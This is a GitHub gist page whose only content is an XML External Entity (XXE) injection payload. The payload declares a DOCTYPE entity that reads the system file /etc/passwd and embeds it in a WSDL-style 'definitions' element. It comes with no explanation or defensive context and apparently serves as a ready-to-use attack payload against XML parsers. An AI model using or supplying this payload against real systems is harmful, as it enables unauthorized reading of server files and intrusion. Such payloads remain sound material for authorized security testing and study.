Skip to content

Instantly share code, notes, and snippets.

@000pp
Created August 2, 2024 20:48
Show Gist options
  • Save 000pp/e7d7bd6705366ef181e54f72bdbe9f79 to your computer and use it in GitHub Desktop.
Save 000pp/e7d7bd6705366ef181e54f72bdbe9f79 to your computer and use it in GitHub Desktop.
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<definitions targetNamespace="http://example.org">
<foo>&xxe;</foo>
</definitions>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment